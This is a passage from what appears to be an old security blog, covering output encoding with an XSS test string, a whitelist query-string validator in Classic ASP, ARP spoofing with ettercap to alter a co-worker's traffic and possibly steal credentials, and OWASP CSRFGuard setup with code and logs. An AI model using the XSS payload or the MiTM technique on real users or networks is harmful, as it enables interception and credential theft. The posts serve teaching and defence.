color="#800000">&amp;#32531;&amp;#24577;&amp;#21183;&amp;#65292;&amp;#26368;&amp;#26032;&amp;#22269;&amp;#20869;&amp;#29983;&amp;#20135;</font> <br /> <font color="#800000">&amp;#24635;&amp;#20540;&amp;#22686;&amp;#38271;&amp;#20026;9.9%&amp;#65292;&amp;#36890;&amp;#32960;&amp;#25345;&amp;</font> <br /> <font color="#800000">#32493;&amp;#25918;&amp;#32531;&amp;#12290; &amp;#20013;&amp;#22269;&amp;#20061;&amp;#26376;&amp;#36152;&amp;#26131;</font> <br /> <font color="#800000">&amp;#30408;&amp;#20313;&amp;#21019;&amp;#32426;&amp;#24405; &amp;#35775;&amp;#35848;&amp;#65306;&amp;#20013;&amp;</font> <br /> <font color="#800000">#22269;&amp;#22806;&amp;#36152;&amp;#21069;&amp;#26223;&amp;#19981;&amp;#23481;&amp;#20048;&amp;#35266; &amp;#37329;</font> <br /> <font color="#800000">&amp;#34701;&amp;#39118;&amp;#26292;&amp;#65306;&amp;#20013;&amp;#22269;&amp;#38754;&amp;#20020;&amp;#30340;&amp;#21361;</font> <br /> <font color="#800000">&amp;#26426;&amp;#19982;&amp;#26426;&amp;#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><b>apache commons unescape then escape with StringEscapeUtils: </b><font color="#ff0000"><strong>&lt;script&gt;alert('xss');&lt;/script&gt;</strong> </font> </font> <br /> <font color="#800000">&#29615;&#29699;&#32463;&#27982;&#19981;&#26223;&#27668;&#20013;&#22269;&#32463;&#27982;&#22686;&#38271;&#25918;</font> <br /> <font color="#800000">&#32531; &#20013;&#22269;&#32463;&#27982;&#22312;&#29615;&#29699;&#19981;&#26223;&#27668;&#19979;&#21576;&#29616;</font> <br /> <font color="#800000">&#25918;&#32531;&#24577;&#21183;&#65292;&#26368;&#26032;&#22269;&#20869;&#29983;&#20135;&#24635;&#20540;&#22686;</font> <br /> <font color="#800000">&#38271;&#20026;9.9%&#65292;&#36890;&#32960;&#25345;&#32493;&#25918;&#32531;&#12290; &#20013;&#22269;&#20061;</font> <br /> <font color="#800000">&#26376;&#36152;&#26131;&#30408;&#20313;&#21019;&#32426;&#24405; &#35775;&#35848;&#65306;&#20013;&#22269;&#22806;</font> <br /> <font color="#800000">&#36152;&#21069;&#26223;&#19981;&#23481;&#20048;&#35266; &#37329;&#34701;&#39118;&#26292;&#65306;&#20013;&#22269;</font> <br /> <font color="#800000">&#38754;&#20020;&#30340;&#21361;&#26426;&#19982;&#26426;&#36935; </font> <br /> <font color="#800000"><br></font> <br /> <font color="#800000"><form action="AscetikServlet" method="POST" ></font> <br /> <font color="#800000"><input type="text" id="input" name="input" ></font> <br /> <font color="#800000"><input type="submit" ></font> <br /> <font color="#800000"></form></font> <br /> <font color="#800000"></body></font> <br /> <font color="#800000"></html></font> <br /> </td><br /> </tr><br /> </tbody></table><br /></blockquote><br /><strong>References:</strong><br /><em>Apache Commons Lang: <a title="http://commons.apache.org/lang/" href="http://commons.apache.org/lang/">http://commons.apache.org/lang/</a></em><br /><em>Struts 1: <a title="http://struts.apache.org/" href="http://struts.apache.org/">http://struts.apache.org/</a></em><br /><em>Struts 2: <a title="http://struts.apache.org/2.x/" href="http://struts.apache.org/2.x/">http://struts.apache.org/2.x/</a></em><br /><em>WebWork: <a title="http://www.opensymphony.com/webwork/" href="http://www.opensymphony.com/webwork/">http://www.opensymphony.com/webwork/</a></em><br /><em>Mycode: <a title="http://my-security-projects.googlecode.com/files/testEncoding.war" href="http://my-security-projects.googlecode.com/files/testEncoding.war">http://my-security-projects.googlecode.com/files/testEncoding.war</a></em><br /><em>My code is written for tomcat 6 with java 1.6 and all the above libraries.</em>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-29090399365392614252008-10-10T22:55:00.005-05:002008-10-23T23:10:07.795-05:00God doesn't play dice. Quantum Crypto is Closer.<p>A quantum crypto device has finally been tested and demonstrated to the BBC. This will be interesting to see how the devices hold up. Quantum Crypto is based on an odd principle of quantum theory called the Heisenberg Uncertainty Principle. It states that the act of observing an experiment changes the outcome. The current model is communicating over fiber optic cable and can communicate with 5 locations in Vienna. Due to the above mentioned principal, if someone where to perform a MiTM attack or sniff the traffic it would change the outcome of the desired result. The system would then produce a very high rate of errors and once this is detected the system will automatically shut itself down to prevent the interception of any confidential data. They are claiming that this will be an un-breakable encryption and i agree if it truly conforms to the Heisenberg Uncertainty Principle then it should be unbreakable. It will be interesting to see how many government allow this technology within its borders once its perfected. Most governments want at least a backdoor or limit the encryption strength. They have made the system to be robust and to reroute itself incase a quantum link breaks down so not to loose data between the two links.</p><p><br /></p><p><br /></p> <p><em>"We are constantly in touch with insurance companies and banks, and they say it's nearly better that they lose 10m euros than if the system is down for two hours, because that might be more damaging for the bank," said Dr Huebel.</em></p> <p><br /></p><p><br /><a title="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm" href="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm"></a></p> <p>But one thing I have learned in security .. never say you are unbreakable. It would be interesting to see if hackers find a flaw in quantum theory that physicists including Albert Einstein have overlooked for years.<br /></p><p><br /></p><p>Source: <a title="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm" href="http://news.bbc.co.uk/2/hi/science/nature/7661311.stm">http://news.bbc.co.uk/2/hi/science/nature/7661311.stm</a></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-43694279346571436542008-10-10T15:51:00.002-05:002008-10-23T23:10:53.882-05:00Ghetto Input validation.<p>I was consulting on a project a few months ago that had very little budget but kept getting hacked weekly. The application was in ASP but that does not really matter for the point that I'm about to make. Since they had very little money and very little time and I wanted to perform very strict input validation I came up with a solution that I am surprised that I have never seen before. <em>Why not just validate the entire query string instead of individual parameters. </em>The entire site has very few post parameters and kept getting hacked through all the GET parameters so I wrote a simple ASP script that I could add to the beginning of every page. If that validation failed then the whole site would redirect to error otherwise execute the page code. I validated the post params individually since there where so few. I know that really what these guys needed to do was use bindable queries but there was aaaaallloottt of SQL and they only accepted alpha numeric, upper and lower case letters. Can anyone think of a reason how this could be exploitable. One quick statement and we stopped all XSS and SQL injection attacks against this site.  These guys where also a very small business that could not afford to be down for days while the code was being developed. For an enterprise I would prolly would not recommend this but for a small startup or local business then I think this could really help.</p> <p> </p> <p>Here is my Classic ASP code.</p> <p><strong>Validation.asp</strong></p> <p>Function ValidateQueryString( input) <br />    Dim re <br />    Set re = New RegExp <br />    ' alphanumeric regular expression <br />    re.global = True <br />    re.Pattern = "^[a-zA-Z0-9\=\&\ ]+$" <br />    re.Test(input) <br />    if(re.Test(input) or input = "") then <br />        ValidateQueryString = True <br />    else <br />        ValidateQueryString = False <br />    end if <br />End Function</p> <p> </p> <p><strong>every page will include this line at the top...</strong></p> <p><!--#include file="Validation.asp" --> <br /><% <br />if(ValidateQueryString(request.QueryString) = False) then <br />    response.redirect("error.asp") <br />end if <br />%></p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-25594229003069975622008-10-09T22:27:00.007-05:002008-10-23T23:11:21.810-05:00No longer confident.<p>This is something that has really started to annoy me ever since I realized it. It came to me while I was playing with ettercap filters. For those who don't know you can use ettercap to perform ARP spoofing and MiTM attacks. etterap filters give you the added functionality to modify any traffic going to and from the victim or victims that you are ARP Spoofing. This has been fun to do things like replace all the images in webpages that your co-worker has been viewing with your own image that you host. Like the following.</p> <p><br /></p><div style="text-align: center;"><a href="http://lh4.ggpht.com/ascetik/SO7LgYy8b8I/AAAAAAAAA-Q/9o3ZnMQvQ8s/s1600-h/image%5B2%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh6.ggpht.com/ascetik/SO7LhTxi5kI/AAAAAAAAA-U/ixb-H07iW20/image_thumb.png?imgmax=800" border="0" width="244" height="213" /></a></div><p> </p> <p><br /></p><p>Thats fun and all but now I have noticed something that ALOT of websites including many financial institutions are doing. They are trying (i assume) to make their home pages load faster by not SSL'ing their home page but still providing login functionality on this page. They usually have a JavaScript fuction that actually submits your credentials over SSL or it could be in a form. So it occurred to me that anyone who happens to be on my same subnet can ARP spoof me and change the javascript . The javascript could be modified to intercept my credentials, send them to another server, and still log me in and I would never know it. In fact i'm not sure of anything that most users can do to know that they are not a victim.<br /></p><p style="text-align: center;"><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_acrzuhZS74A/SPDWMb5PN-I/AAAAAAAAA-o/jZL0Cr1x4NA/s1600-h/bad.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_acrzuhZS74A/SPDWMb5PN-I/AAAAAAAAA-o/jZL0Cr1x4NA/s320/bad.jpg" alt="" id="BLOGGER_PHOTO_ID_5255936274275973090" border="0" /></a><br /></p><p><br /></p> <p>This is a poor coding practice that takes away all the visual cues that browsers are putting in place to ensure that you are sending your credentials over a secure link and training users not too look for them. Its not that hard to have a button that says "click here to sign in" to redirect you to an SSL'd login page. I have seen some sites that are ssl's but load some of their javascript from non-ssl'd sources which could allow for session stealling from sites that do set their cookies securly. My recomendations to developers are:</p><p>1. Only allow your users to enter crendentials on an SSL'd page.</p><p>2. Once users are on a secure section of the site then load all your javascript, images, or any other included content from only ssl'd sources as well.</p><p><br /></p> <p style="text-align: center;"><a href="http://lh6.ggpht.com/ascetik/SO7Lh3TQVrI/AAAAAAAAA-Y/Vm-Z5Jon0bI/s1600-h/image%5B5%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh5.ggpht.com/ascetik/SO7LiKGWkzI/AAAAAAAAA-c/k_8wlQgyPJI/image_thumb%5B1%5D.png?imgmax=800" border="0" width="239" height="102" /></a><br /></p><p style="text-align: center;"> <a href="http://lh5.ggpht.com/ascetik/SO7LiWcZmGI/AAAAAAAAA-g/LRYG8-xitlE/s1600-h/image%5B8%5D.png"><img style="border: 0px none ;" alt="image" src="http://lh5.ggpht.com/ascetik/SO7LiVtFLsI/AAAAAAAAA-k/9QDFUN_RE_Y/image_thumb%5B2%5D.png?imgmax=800" border="0" width="217" height="61" /></a></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2410549130005981530.post-44863940874527040652008-06-12T00:42:00.002-05:002008-10-23T23:11:54.338-05:00CSRFGuard Take 2<p>Well I been doing a little more experimentation with CSRFGuard and realized I have a flawed configuration in my last post. I figured that the initial page (say your login page) had to be outside your CSRF protected filter because you do not have a session and therefore no csrf token and the filter would fail. But it fails open. At first I thought this was a flaw but this makes perfect sense. You can now protect all your content with one csrf filter and not have to keep a special directory unprotected for your login pages and the like. </p> <p> </p> <p>Another trick that CSRFGuard does is to automatically add your csrf token to your links in most cases. This makes it easier to integrate csrfguard into an existing application and makes it trivial to ensure that every request is sending the csrftoken without you having to code around it. I found that for some dynamically generated code like response.sendRedirect("index.jsp"); this will not work without a little help. </p> <p> </p> <p>There are a few different response handlers that you can set in the csrfguard.properties for CSRFGuard to automatically add your token to your html. They are: </p> <p><strong>org.owasp.csrfguard.handlers.HTMLParserHandler</strong> will automatically parse the html response for a urls to attach the csrf token. This is performed server side. </p> <p><strong>org.owasp.csrfguard.handlers.RegExHandler</strong> will allow you to specify a regular expression that be searched in the html response and the append the token to the match. This action again is performed on the server side. I have not tried this one yet.</p> <p><strong>org.owasp.csrfguard.handlers.JavaScriptHandler</strong> will include javascript to your response (csrf.js). This will append csrf tokens on the client and save you some processor time on the server.</p> <p> </p> <p><strong>The Example</strong> </p> <p><strong></strong>I will walk you through my example that consists of a login page and 2 csrf protected areas. </p> <p>Here is my basic login page. It does 3 things. (1)If there isn't a session then you are presented with the logon page.(2) if you are submitting your credentials then it checks your credentials then it adds the generated csrf token and your userid to the session. The later is solely to represent a user and nothing to do with csrf guard. Ideally this app would query a sql database or ldap but i'm trying to keep it simple. (3) If you are logged in already and access the logon page then you are redirected back to the csrfProtectedArea1.do </p> <p> </p> <p><font color="#0000a0"><%@ page language="java" contentType="text/html; charset=ISO-8859-1" <br />    pageEncoding="ISO-8859-1"%> <br /><jsp:directive.page import="org.owasp.csrfguard.util.*"/> <br /><jsp:directive.page import="javax.servlet.http.*"/> </font></p> <p><font color="#0000a0"><%@ page session="true" %> </font></p> <p><font color="#0000a0"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "</font><a href="http://www.w3.org/TR/html4/loose.dtd" ?="?"><font color="#0000a0">http://www.w3.org/TR/html4/loose.dtd"</font></a><font color="#0000a0">> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>LogIn Page</title> <br /></head> <br /><body> </font></p> <p><font color="#0000a0"><% </font></p> <p><font color="#0000a0">String login =""; <br />String username = ""; <br />String  password = ""; </font></p> <p><font color="#0000a0">login = request.getParameter("Login"); </font></p> <p><font color="#0000a0">// Login is set to 1 when the credentials are sent. not really necessary. </font></p> <p><font color="#0000a0">if(login != null && login.equals("1")) <br />{ <br />    username = request.getParameter("username"); <br />    password = request.getParameter("password"); <br />    if(username != null && password != null && username.equals("Guest") && password.equals("Guest1")) <br />    { <br />        HttpSession sess = request.getSession(true); <br />        sess.setAttribute("uid", "1111"); <br />        response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") ); <br />    } <br />    else  // login failed <br />    { <br />        out.write("<h3> Error: Please Log in again </h3><br>"); <br />        out.write("<h1>Please Login Below</h1>"); <br />        out.write("<form method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>"); <br />    } <br />} <br />else if (request.getSession().getAttribute("uid") != null && request.getSession().getAttribute("uid").equals("1111")) <br />{ </font></p> <p><font color="#0000a0">//session is active that the userid matches. <br />    HttpSession sess = request.getSession(true); <br />    response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + sess.getAttribute("OWASP_CSRFTOKEN") ); <br />    //response.sendRedirect("/CSRFTest/csrfServlet.do"); <br />} <br />else <br />{ </font></p> <p><font color="#0000a0">// normal login when a session is not present </font></p> <p><font color="#0000a0">        out.write("<h1>Please Login Below.</h1>"); <br />        out.write("<form  method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>"); <br />} </font></p> <p><font color="#0000a0">%> </font></p> <p><font color="#0000a0"></body> <br /></html></font> </p> <p> </p> <p><strong>Automatic Generation of Tokens </strong></p> <p>Now in the above code you will notice the following: </p> <p>response.sendRedirect("/CSRFTest/csrfProtectedArea1.do?OWASP_CSRFTOKEN=" + request.getParameter("OWASP_CSRFTOKEN") ); </p> <p>I'm calling the request.getParamter but my form submission looks like this with no csrf token parameter because the filter will add it to the html automatically. </p> <p>   <font color="#0000a0">     out.write("<h1>Please Login Below.</h1>"); <br />        out.write("<form  method=\"POST\" action=\"index.jsp\">"); <br />        out.write("<br> User Name: <input type=\"text\" name=\"username\">"); <br />        out.write("<br> Password:  <input type=\"password\" name=\"password\">"); <br />        out.write("<input type=\"hidden\" name=\"Login\" value=\"1\">"); <br />        out.write("<br> <input type=\"submit\" name=\"loginBtn\" value=\"Login\" >    "); <br />        out.write("</form>");</font> </p> <p> </p> <p>My generated html on the client for the the login page looks like this: </p> <p><font color="#0000a0"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "</font><a href="http://www.w3.org/TR/html4/loose.dtd" ?="?"><font color="#0000a0">http://www.w3.org/TR/html4/loose.dtd"</font></a><font color="#0000a0">> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>LogIn Page</title> <br /></head> <br /><body><h1>Please Login Below.</h1><form  method="POST" action="index.jsp"><br> User Name: <input type="text" name="username"><br> Password:  <input type="password" name="password"><input type="hidden" name="Login" value="1"><br> <input type="submit" name="loginBtn" value="Login" >    <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T></form> </font></p> <p><font color="#0000a0"></body> <br /></html></font> </p> <p> </p> <p>As you can see the <INPUT type=hidden name=OWASP_CSRFTOKEN value=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T> is automatically generated by the HTMLParseHandler </p> <p>Now lets look at the csrfProtectedArea1.java. This page is session protected and csrf protected. </p> <p><font color="#0000a0">import java.io.IOException; <br />import java.io.PrintWriter; <br />import javax.servlet.*; <br />import javax.servlet.http.*; <br />import javax.servlet.jsp.*; <br />import org.apache.jasper.runtime.*; </font></p> <p><font color="#0000a0">public class csrfProtectedArea1 extends HttpServlet { <br />    /** <br />     * <br />     */ <br />    private static final long serialVersionUID = -6429166168752177032L; </font></p> <p><font color="#0000a0">    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException <br />    { </font></p> <p><font color="#0000a0">        HttpSession sess = request.getSession(); <br />        if(sess.getAttribute("uid")!= null && sess.getAttribute("uid").equals("1111")) <br />        { <br />            response.setContentType("text/html"); <br />            PrintWriter out = response.getWriter(); <br />            out.println("<html>"); <br />            out.println("<body>"); <br />            out.println("You Made it<br>"); <br />            out.println("<a href=\"csrfProtectedArea2.jsp\" > Click Here </a>"); <br />            out.println("<a href=\"index.jsp\" > Click Here </a>"); <br />            out.println("</body>"); <br />            out.println("</html>"); <br />        } <br />        else <br />        { <br />            response.sendRedirect("/CSRFTest/error.jsp"); <br />        } <br />    } <br />}</font> </p> <p>The generated html from this looks like the following. </p> <p><font color="#0000a0"><html> <br /><body> <br />You Made it<br> <br /><a href="csrfProtectedArea2.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a> <br /><a href="index.jsp?OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T&OWASP_CSRFTOKEN=eKKqjn7Pqm6GLvc7bCMoYCwPbpFhXDcQSIKVnvLutX8T" > Click Here </a> <br /></body> <br /></html></font> </p> <p>I have two links in this response. One goes back to the login page (index.jsp) and the other goes to another csrf protected area. As you can see the response handler automatically updates all links found in the html with the csrf token. One error I keep getting is that the first link gets 2 tokens added to it. I have not figured this out yet but it does not prevent the application for functioning properly. </p> <p> </p> <p><strong>CSRFGuard Handles the Attack </strong></p> <p>One other cool thing about csrfGuard is that if you submit a request with a missing or incorrect token CSRFGuard will invalidate your session and redirect you to the error page defined in the csrfguard.properties file. </p> <p>One problem I have found with this is in the logging. For instance here is an example log file from a failed csrf request. </p> <p> </p> <p><font face="Courier">Jun 12, 2008 12:12:31 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] the following properties were loaded into CSRFGuard <br />     Debug:            true <br />     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler <br />     Token Name:        OWASP_CSRFTOKEN <br />     Token Length:        32 <br />     PRNG:            SHA1PRNG <br />     Action Count:        3 <br />        Action(0)    org.owasp.csrfguard.actions.Redirect <br />        Action(1)    org.owasp.csrfguard.actions.Log <br />        Action(2)    org.owasp.csrfguard.actions.Invalidate </font></p> <p><font face="Courier">Jun 12, 2008 12:14:28 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] the following properties were loaded into CSRFGuard <br />     Debug:            true <br />     ResponseHandler:    org.owasp.csrfguard.handlers.HTMLParserHandler <br />     Token Name:        OWASP_CSRFTOKEN <br />     Token Length:        32 <br />     PRNG:            SHA1PRNG <br />     Action Count:        3 <br />        Action(0)    org.owasp.csrfguard.actions.Redirect <br />        Action(1)    org.owasp.csrfguard.actions.Log <br />        Action(2)    org.owasp.csrfguard.actions.Invalidate </font></p> <p><font face="Courier">Jun 12, 2008 12:14:59 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2FcsrfProtectedArea1.do Referer:  Parameters: OWASP_CSRFTOKEN%3DPzEIce4raEWbtC97i8oMgf3Y2yJjf1A1XriZ7GcWaLU) <br />Jun 12, 2008 12:16:36 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: GET URI: %2FCSRFTest%2F Referer:  Parameters: ) <br />Jun 12, 2008 12:17:00 AM org.apache.catalina.core.ApplicationContext log <br />INFO: [CSRFGuard] caught CSRF attack (IP: 0:0:0:0:0:0:0:1 Method: POST URI: %2FCSRFTest%2Findex.jsp Referer: http%3A%2F%2Flocalhost%3A8080%2FCSRFTest%2Findex.jsp%3FOWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5Iu Parameters: <font color="#ff0000">password%3DGuest1</font>%2COWASP_CSRFTOKEN%3DOX7CJcASSH10DsQFhHQy6nIBHbuYWeXRguxeCjLch5I%2CLogin%3D1%2CloginBtn%3DLogin%<font color="#ff0000">2Cusername%3DGuest)</font></font> </p> <p> </p> <p>It will log all parameters from the failed request which in this case will log the username and password of the user. Something to consider if deploying CSRFGuard to a production system. </p> <p> </p> <h3><strong>Additional Information</strong> </h3> <p>Below are the csrfguard.properties and the web.xml i used. </p> <p>csrfguard properties file: </p> <p>org.owasp.csrfguard.Debug=true <br />org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.HTMLParserHandler <br />org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN <br />org.owasp.csrfguard.TokenLength=32 <br />org.owasp.csrfguard.PRNG=SHA1PRNG <br />org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log <br />org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate <br />org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect <br />org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp </p> <p>web.xml </p> <p><?xml version="1.0" encoding="UTF-8"?> <br /><web-app xmlns:xsi="<a href="http://www.w3.org/2001/XMLSchema-instance" ?="?">http://www.w3.org/2001/XMLSchema-instance"</a> xmlns="<a href="http://java.sun.com/xml/ns/javaee" ?="?">http://java.sun.com/xml/ns/javaee"</a> xmlns:web="<a href="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" ?="?">http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"</a> xsi:schemaLocation="<a href="http://java.sun.com/xml/ns/javaee">http://java.sun.com/xml/ns/javaee</a> <a href="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" ?="?">http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"</a> id="WebApp_ID" version="2.5"> <br />  <display-name>CSRFTest</display-name> <br />  <welcome-file-list> <br />    <welcome-file>index.html</welcome-file> <br />    <welcome-file>index.htm</welcome-file> <br />    <welcome-file>index.jsp</welcome-file> <br />    <welcome-file>default.html</welcome-file> <br />    <welcome-file>default.htm</welcome-file> <br />    <welcome-file>default.jsp</welcome-file> <br />  </welcome-file-list> <br /><filter> <br />  <filter-name>CSRFGuard</filter-name> <br />  <filter-class>org.owasp.csrfguard.CSRFGuardFilter</filter-class> <br />    <init-param> <br />      <param-name>config</param-name> <br />      <param-value>WEB-INF/csrfguard.properties</param-value> <br />    </init-param> <br /></filter> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><servlet-name>csrfProtectedArea1</servlet-name> <br /></filter-mapping> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><url-pattern>*.do</url-pattern> <br /></filter-mapping> </p> <p><filter-mapping> <br /><filter-name>CSRFGuard</filter-name> <br /><url-pattern>*.jsp</url-pattern> <br /></filter-mapping> </p> <p>  <servlet> <br />      <servlet-name>csrfProtectedArea1</servlet-name> <br />      <servlet-class>csrfProtectedArea1</servlet-class> <br />  </servlet> <br />  <servlet-mapping> <br />      <servlet-name>csrfProtectedArea1</servlet-name> <br />      <url-pattern>/csrfProtectedArea1.do</url-pattern> <br />  </servlet-mapping> <br />  </web-app> </p>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2410549130005981530.post-35056308895397340072008-06-05T15:48:00.002-05:002008-10-23T23:12:20.151-05:00CSRFGuard Testing<p>Well I have been playing with CSRFGuard lately from the OWASP website. Its basically allows you to set up certain pages that are CSRF protected and whenever a link is selected the http request is parsed for a token that you define and checks if that token is in your session. Below is some sample code all running on Tomcat 6X. I'm not sure if I have this completely the way they intended but it works. </p> <p> <p> <br /><strong>Example CSRFGuard.properties:</strong> <br /> <br /><font color="#800000">org.owasp.csrfguard.Debug=true <br />org.owasp.csrfguard.ResponseHandler=org.owasp.csrfguard.handlers.JavaScriptHandler <br />org.owasp.csrfguard.TokenName=OWASP_CSRFTOKEN <br />org.owasp.csrfguard.TokenLength=32 <br />org.owasp.csrfguard.PRNG=SHA1PRNG <br />org.owasp.csrfguard.action.class.Log=org.owasp.csrfguard.actions.Log <br />org.owasp.csrfguard.action.class.Invalidate=org.owasp.csrfguard.actions.Invalidate <br />org.owasp.csrfguard.action.class.Redirect=org.owasp.csrfguard.actions.Redirect <br />org.owasp.csrfguard.action.class.Redirect.param.ErrorPage=error.jsp <br /></font> <br />You can name the org.owasp.csrfguard.TokenName can be set to what ever you want as long as you set it in your code. <br /></p> <p></p> <strong>Example web.xml:</strong></p> <p>My Web.xml. Here you define the location and name of the csrfguard.properties and the resources that you wish to protect with CSRFGuard. Here I am protecting the csrfServlet. </p> <p> <br /> <br /><font color="#800000"><?xml version="1.0" encoding="UTF-8"?> <br /><web-app xmlns:xsi="</font><a href="http://www.w3.org/2001/XMLSchema-instance""><font color="#800000">http://www.w3.org/2001/XMLSchema-instance"</font></a><font color="#800000"> xmlns="</font><a href="http://java.sun.com/xml/ns/javaee""><font color="#800000">http://java.sun.com/xml/ns/javaee"</font></a><font color="#800000"> xmlns:web="</font><a href="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd""><font color="#800000">http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"</font></a><font color="#800000"> xsi:schemaLocation="</font><a href="http://java.sun.com/xml/ns/javaee"><font color="#800000">http://java.sun.com/xml/ns/javaee</font></a><font color="#800000"> </font><a href="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd""><font color="#800000">http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"</font></a><font color="#800000"> id="WebApp_ID" version="2.5"> <br />  <display-name>CSRFTest</display-name> <br />  <welcome-file-list> <br />    <welcome-file>index.html</welcome-file> <br />    <welcome-file>index.htm</welcome-file> <br />    <welcome-file>index.jsp</welcome-file> <br />    <welcome-file>default.html</welcome-file> <br />    <welcome-file>default.htm</welcome-file> <br />    <welcome-file>default.jsp</welcome-file> <br />  </welcome-file-list> <br /><filter> <br />  <filter-name>CSRFGuard</filter-name> <br />  <filter-class>org.owasp.csrfguard.CSRFGuardFilter</filter-class> <br />    <init-param> <br />      <param-name>config</param-name> <br />      <param-value>WEB-INF/csrfguard.properties</param-value> <br />    </init-param> <br /></filter></font> </p> <p><font color="#800000"><filter-mapping> <br /> <filter-name>CSRFGuard</filter-name> <br /> <servlet-name>csrfServlet</servlet-name> <br /></filter-mapping></font> </p> <p><font color="#800000"><filter-mapping> <br /> <filter-name>CSRFGuard</filter-name> <br /> <url-pattern>*.do</url-pattern> <br /></filter-mapping></font> </p> <p><font color="#800000">  <servlet> <br />      <servlet-name>csrfServlet</servlet-name> <br />      <servlet-class>csrfServlet</servlet-class> <br />  </servlet> <br />  <servlet-mapping> <br />      <servlet-name>csrfServlet</servlet-name> <br />      <url-pattern>/csrfServlet.do</url-pattern> <br />  </servlet-mapping> <br />  </web-app></font> <br /></p> <p><strong>Example Login Page:</strong> <p>My Login page (kinda). This page should not be inside the CSRFGuard filter defined in the web.xml. I actually don't log in but establish a session and add my OWASP_CSRFTOKEN to my session. </p> </p> <p> <p></p> <p> <br /><font color="#800000"><%@ page language="java" contentType="text/html; charset=ISO-8859-1" <br />    pageEncoding="ISO-8859-1"%> <br /><jsp:directive.page import="org.owasp.csrfguard.util.*"/> <br /><jsp:directive.page import="javax.servlet.http.*"/></font> </p> </p> <p><font color="#800000"><%@ page session="true" %></font> </p> <p><font color="#800000"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "</font><a href="http://www.w3.org/TR/html4/loose.dtd""><font color="#800000">http://www.w3.org/TR/html4/loose.dtd"</font></a><font color="#800000">> <br /><html> <br /><head> <br /><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <br /><title>Insert title here</title> <br /></head> <br /><body></font> </p> <p><font color="#800000"><% <br />TokenGenerator token = new TokenGenerator(); <br />HttpSession sess = request.getSession(true); <br />String csrf = token.generateCSRFToken("SHA1PRNG",32); <br />sess.setAttribute("OWASP_CSRFTOKEN", csrf);</font> </p> <p><font color="#800000">%> <br /><a href="/CSRFTest/csrfServlet.do?OWASP_CSRFTOKEN=<%=csrf %>" > Click me to get to Protected Site </a</font>> </p> <p><font 